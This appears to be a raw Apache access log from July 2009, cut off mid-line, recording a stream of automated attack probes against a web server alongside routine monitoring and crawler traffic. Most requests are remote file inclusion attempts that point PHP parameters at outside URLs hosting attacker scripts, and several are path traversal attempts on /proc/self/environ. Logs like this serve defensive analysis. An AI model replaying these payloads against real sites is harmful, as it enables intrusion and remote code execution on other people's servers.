80.190.246.41 - - [06/Jul/2009:06:30:00 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.100.5.136 - - [06/Jul/2009:06:30:07 -0400] "GET /logs/access_log.Q109052700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:30:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.117.128.143 - - [06/Jul/2009:06:31:01 -0400] "GET /logs/error_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.221.80.19 - - [06/Jul/2009:06:31:23 -0400] "GET /logs/access_log.Q109052100//viewbody.html?code=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:31:40 -0400] "GET //galeria.php?start=0&kategoria=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:31:40 -0400] "GET /logs//galeria.php?start=0&kategoria=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:31:40 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:31:45 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:18 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:18 -0400] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:18 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:20 -0400] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:20 -0400] "GET /logs/access_log.Q109061200//components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:20 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:20 -0400] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:20 -0400] "GET /logs/access_log.Q109061200//components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:20 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:06:32:34 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.221.88.162 - - [06/Jul/2009:06:32:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [06/Jul/2009:06:32:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [06/Jul/2009:06:32:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [06/Jul/2009:06:32:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
209.51.133.202 - - [06/Jul/2009:06:32:40 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.45.176.74 - - [06/Jul/2009:06:32:43 -0400] "GET /logs/access_log.Q109062700/administrator/components/com_moofaq/css/file_includer.php?file=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.158.185.67 - - [06/Jul/2009:06:32:45 -0400] "GET /logs/access_log.Q109062700//components/com_forum/download.php?phpbb_root_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.158.185.67 - - [06/Jul/2009:06:32:45 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.158.185.67 - - [06/Jul/2009:06:32:45 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.158.185.67 - - [06/Jul/2009:06:32:47 -0400] "GET /logs/access_log.Q109062700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
85.158.185.67 - - [06/Jul/2009:06:32:47 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
85.158.185.67 - - [06/Jul/2009:06:32:47 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
85.158.185.67 - - [06/Jul/2009:06:32:47 -0400] "GET /logs/access_log.Q109062700//components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 259 "-" "XXXXXX"
85.158.185.67 - - [06/Jul/2009:06:32:47 -0400] "GET //components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
85.158.185.67 - - [06/Jul/2009:06:32:47 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
85.158.185.67 - - [06/Jul/2009:06:32:48 -0400] "GET /logs/access_log.Q109062700//components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 259 "-" "XXXXXX"
85.158.185.67 - - [06/Jul/2009:06:32:48 -0400] "GET //components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
85.158.185.67 - - [06/Jul/2009:06:32:48 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
209.51.133.202 - - [06/Jul/2009:06:33:10 -0400] "GET /logs/error_log.Q109061200%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:06:33:11 -0400] "GET /logs/access_log.Q109060500//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
72.82.228.83 - - [06/Jul/2009:06:33:11 -0400] "GET //hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
72.82.228.83 - - [06/Jul/2009:06:33:11 -0400] "GET /logs//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
72.82.228.83 - - [06/Jul/2009:06:33:11 -0400] "GET /logs/access_log.Q109060400//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
72.82.228.83 - - [06/Jul/2009:06:33:13 -0400] "GET /logs/access_log.Q109060500//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
72.82.228.83 - - [06/Jul/2009:06:33:13 -0400] "GET //hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
72.82.228.83 - - [06/Jul/2009:06:33:14 -0400] "GET /logs//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
72.82.228.83 - - [06/Jul/2009:06:33:14 -0400] "GET /logs/access_log.Q109060400//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
217.125.38.117 - - [06/Jul/2009:06:33:20 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:33:32 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:06:33:33 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
218.158.98.196 - - [06/Jul/2009:06:33:34 -0400] "GET /phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
218.158.98.196 - - [06/Jul/2009:06:33:35 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
218.38.136.16 - - [06/Jul/2009:06:34:20 -0400] "GET /logs/access_log.Q109061200///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
218.38.136.16 - - [06/Jul/2009:06:34:21 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 200 8392 "-" "libwww-perl/5.79"
217.125.38.117 - - [06/Jul/2009:06:34:31 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:34:42 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:06:35:11 -0400] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:06:35:11 -0400] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:06:35:11 -0400] "GET /logs/access_log.Q109051100/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:06:35:22 -0400] "GET /logs/access_log.Q109052800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
80.190.246.41 - - [06/Jul/2009:06:35:32 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:35:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.184.70.253 - - [06/Jul/2009:06:35:46 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
93.184.70.253 - - [06/Jul/2009:06:35:46 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
93.184.70.253 - - [06/Jul/2009:06:35:46 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
93.184.70.253 - - [06/Jul/2009:06:35:49 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
93.184.70.253 - - [06/Jul/2009:06:35:49 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
93.184.70.253 - - [06/Jul/2009:06:35:49 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
93.184.70.253 - - [06/Jul/2009:06:36:03 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
93.184.70.253 - - [06/Jul/2009:06:36:08 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
80.190.246.41 - - [06/Jul/2009:06:36:22 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:06:37:01 -0400] "GET /images/items/6221000_thumb.jpg HTTP/1.1" 200 2380 "-" "Googlebot-Image/1.0"
61.100.5.136 - - [06/Jul/2009:06:37:10 -0400] "GET /logs/access_log.Q109052300//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
61.100.5.136 - - [06/Jul/2009:06:37:24 -0400] "GET /logs/access_log.Q109052700//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:06:37:30 -0400] "GET /logs/error_log.Q109060700%20/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
84.201.208.50 - - [06/Jul/2009:06:37:35 -0400] "GET //bbs/skin/uks_vote_v3021/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:06:37:35 -0400] "GET /logs/access_log.Q109051100%20%20//bbs/skin/uks_vote_v3021/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:06:37:35 -0400] "GET /logs//bbs/skin/uks_vote_v3021/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.109.245.179 - - [06/Jul/2009:06:38:12 -0400] "GET //hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:06:38:12 -0400] "GET /logs/access_log.Q109060400//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:06:38:12 -0400] "GET /logs//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:06:38:12 -0400] "GET /logs/access_log.Q109060600//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
172.16.1.180 - - [06/Jul/2009:06:38:50 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:38:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:38:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
61.109.245.179 - - [06/Jul/2009:06:38:51 -0400] "GET /logs//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:06:38:51 -0400] "GET //hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:06:38:51 -0400] "GET /logs/access_log.Q109060600//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:06:38:51 -0400] "GET /logs/access_log.Q109060400//hpmaker/index.php?p=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:06:40:31 -0400] "GET /logs/access_log.Q109051100/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:06:40:31 -0400] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:06:40:31 -0400] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jul/2009:06:40:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [06/Jul/2009:06:40:41 -0400] "GET /logs/access_log.Q109052800%20%20//bbs/skin/uks_vote_v3021/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jul/2009:06:40:51 -0400] "GET /logs/access_log.Q109052800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.158.98.196 - - [06/Jul/2009:06:41:40 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
172.16.1.180 - - [06/Jul/2009:06:42:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:42:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:42:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.65.36 - - [06/Jul/2009:06:43:00 -0400] "GET /logs/access_log.Q109062500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.65.41.165 - - [06/Jul/2009:06:43:03 -0400] "GET /logs/error_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
172.16.1.180 - - [06/Jul/2009:06:43:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:43:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:43:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:44:19 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:44:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [06/Jul/2009:06:44:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.221.88.162 - - [06/Jul/2009:06:44:40 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [06/Jul/2009:06:44:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [06/Jul/2009:06:44:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [06/Jul/2009:06:44:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
218.246.20.221 - - [06/Jul/2009:06:44:50 -0400] "GET /logs/error_log.Q109060700%20/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
72.29.81.145 - - [06/Jul/2009:06:45:05 -0400] "GET /logs/access_log.Q109052700//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:06 -0400] "GET /logs/access_log.Q109052700//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:06 -0400] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:06 -0400] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:06 -0400] "GET //contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:06 -0400] "GET //contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:08 -0400] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:08 -0400] "GET //contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:08 -0400] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:08 -0400] "GET //contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:12 -0400] "GET /logs/access_log.Q109052700//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:12 -0400] "GET /logs/access_log.Q109052700//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:45:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.29.81.145 - - [06/Jul/2009:06:45:54 -0400] "GET //contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:54 -0400] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.29.81.145 - - [06/Jul/2009:06:45:56 -0